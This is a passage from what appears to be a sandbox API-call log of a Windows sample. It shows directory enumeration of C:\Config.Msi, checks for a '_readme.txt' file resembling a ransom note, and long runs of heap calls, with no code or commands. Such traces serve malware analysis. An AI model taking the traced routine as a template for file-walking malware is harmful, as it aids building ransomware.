ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ea15050, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0058.119] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0058.119] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0058.119] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0058.119] PathFindFileNameW (pszPath="C:\\Config.Msi\\") returned="Config.Msi\\" [0058.119] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0058.119] PathFindFileNameW (pszPath="") returned="" [0058.119] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75fd0000 [0058.119] GetProcAddress (hModule=0x75fd0000, lpProcName="SHGetFolderPathW") returned 0x76055708 [0058.120] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3297a68 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0058.120] FreeLibrary (hLibModule=0x75fd0000) returned 1 [0058.120] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0058.120] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0058.120] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e7c0 | out: hHeap=0x660000) returned 1 [0058.120] PathAppendW (in: pszPath="C:\\Config.Msi\\", pMore="_readme.txt" | out: pszPath="C:\\Config.Msi\\_readme.txt") returned 1 [0058.120] PathFileExistsW (pszPath="C:\\Config.Msi\\_readme.txt") returned 1 [0058.120] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.120] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e7c0 [0058.120] FindFirstFileW (in: lpFileName="C:\\Config.Msi\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x1ea3b1b0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ea3b1b0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0058.120] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e7c0 | out: hHeap=0x660000) returned 1 [0058.120] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x1ea3b1b0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ea3b1b0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.120] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ea3b1b0, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ea3b1b0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ea3b1b0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0058.120] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e7c0 [0058.120] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3216b00 [0058.120] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e7c0 | out: hHeap=0x660000) returned 1 [0058.120] PathFindExtensionW (pszPath="C:\\Config.Msi\\_readme.txt") returned=".txt" [0058.120] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3216b00 | out: hHeap=0x660000) returned 1 [0058.120] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ea3b1b0, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ea3b1b0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ea3b1b0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0058.120] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0058.121] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec48 | out: hHeap=0x660000) returned 1 [0058.121] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.121] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e9c8 | out: hHeap=0x660000) returned 1 [0058.121] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0058.121] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3216b00 [0058.121] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0058.121] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3216830 [0058.121] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.121] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.121] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3216830 | out: hHeap=0x660000) returned 1 [0058.121] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3216830 [0058.121] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.121] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.121] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3216830 | out: hHeap=0x660000) returned 1 [0058.121] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3216830 [0058.121] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.121] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.121] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3216830 | out: hHeap=0x660000) returned 1 [0058.121] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3216830 [0058.121] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.121] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.121] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3216830 | out: hHeap=0x660000) returned 1 [0058.121] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3216830 [0058.121] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.121] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.121] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3216830 | out: hHeap=0x660000) returned 1 [0058.121] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3216830 [0058.121] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0058.121] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.121] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3216830 | out: hHeap=0x660000) returned 1 [0058.121] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3216b00 | out: hHeap=0x660000) returned 1 [0058.121] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0058.121] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e9c8 [0058.121] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0058.121] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec48 [0058.122] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.122] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.122] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec48 | out: hHeap=0x660000) returned 1 [0058.122] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec48 [0058.122] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.122] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.122] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec48 | out: hHeap=0x660000) returned 1 [0058.122] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec48 [0058.122] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.122] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.122] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec48 | out: hHeap=0x660000) returned 1 [0058.122] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec48 [0058.122] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.122] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.122] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec48 | out: hHeap=0x660000) returned 1 [0058.122] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec48 [0058.122] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.122] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.122] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec48 | out: hHeap=0x660000) returned 1 [0058.122] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec48 [0058.122] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0058.122] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.122] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec48 | out: hHeap=0x660000) returned 1 [0058.122] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec48 [0058.122] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.122] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x9c778e8 [0058.122] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.122] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.122] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec48 | out: hHeap=0x660000) returned 1 [0058.122] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec48 [0058.122] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.122] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.122] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec48 | out: hHeap=0x660000) returned 1 [0058.122] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec48 [0058.122] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0058.122] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.122] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec48 | out: hHeap=0x660000) returned 1 [0058.123] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec48 [0058.123] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.123] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.123] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec48 | out: hHeap=0x660000) returned 1 [0058.123] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec48 [0058.123] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.123] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.123] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec48 | out: hHeap=0x660000) returned 1 [0058.123] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec48 [0058.123] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.123] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.123] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec48 | out: hHeap=0x660000) returned 1 [0058.123] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec48 [0058.123] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.123] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.123] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec48 | out: hHeap=0x660000) returned 1 [0058.123] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec48 [0058.123] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0058.123] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.123] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec48 | out: hHeap=0x660000) returned 1 [0058.123] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec48 [0058.123] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0058.123] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.123] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec48 | out: hHeap=0x660000) returned 1 [0058.123] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec48 [0058.123] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.123] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.123] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec48 | out: hHeap=0x660000) returned 1 [0058.123] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec48 [0058.123] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.123] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.123] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec48 | out: hHeap=0x660000) returned 1 [0058.123] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec48 [0058.123] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.123] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.123] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec48 | out: hHeap=0x660000) returned 1 [0058.123] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec48 [0058.124] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.124] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.124] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec48 | out: hHeap=0x660000) returned 1 [0058.124] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec48 [0058.124] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.124] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.124] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec48 | out: hHeap=0x660000) returned 1 [0058.124] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec48 [0058.124] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.124] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.124] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec48 | out: hHeap=0x660000) returned 1 [0058.124] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e9c8 | out: hHeap=0x660000) returned 1 [0058.124] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0058.124] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e9c8 [0058.124] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0058.124] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec48 [0058.124] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.124] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.124] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec48 | out: hHeap=0x660000) returned 1 [0058.124] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec48 [0058.124] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.124] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.124] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec48 | out: hHeap=0x660000) returned 1 [0058.124] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec48 [0058.124] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.124] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.124] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec48 | out: hHeap=0x660000) returned 1 [0058.124] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec48 [0058.124] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.124] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.124] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec48 | out: hHeap=0x660000) returned 1 [0058.124] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec48 [0058.124] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.124] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.125] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec48 | out: hHeap=0x660000) returned 1 [0058.125] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec48 [0058.125] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0058.125] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.125] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec48 | out: hHeap=0x660000) returned 1 [0058.125] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec48 [0058.125] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.125] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x9c778e8 [0058.125] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.125] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.125] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec48 | out: hHeap=0x660000) returned 1 [0058.125] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec48 [0058.125] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.125] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.125] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec48 | out: hHeap=0x660000) returned 1 [0058.125] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec48 [0058.125] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0058.125] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.125] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec48 | out: hHeap=0x660000) returned 1 [0058.125] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec48 [0058.125] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.125] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.125] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec48 | out: hHeap=0x660000) returned 1 [0058.125] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec48 [0058.125] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.125] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.125] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec48 | out: hHeap=0x660000) returned 1 [0058.125] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec48 [0058.125] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.125] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.125] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec48 | out: hHeap=0x660000) returned 1 [0058.125] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec48 [0058.125] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.125] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.125] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec48 | out: hHeap=0x660000) returned 1 [0058.125] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e9c8 | out: hHeap=0x660000) returned 1 [0058.125] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0058.126] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257048 [0058.126] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0058.126] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257400 [0058.126] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.126] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.126] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257400 | out: hHeap=0x660000) returned 1 [0058.126] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257400 [0058.126] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.126] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.126] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257400 | out: hHeap=0x660000) returned 1 [0058.126] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257400 [0058.126] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.126] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.126] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257400 | out: hHeap=0x660000) returned 1 [0058.126] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257400 [0058.126] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.126] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.126] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257400 | out: 